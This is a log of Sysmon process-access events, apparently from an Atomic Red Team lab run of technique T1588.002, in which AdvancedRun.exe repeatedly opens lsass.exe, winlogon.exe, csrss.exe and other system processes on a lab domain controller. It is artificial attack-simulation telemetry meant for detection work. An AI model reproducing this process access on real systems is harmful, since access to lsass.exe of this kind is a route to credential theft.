17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
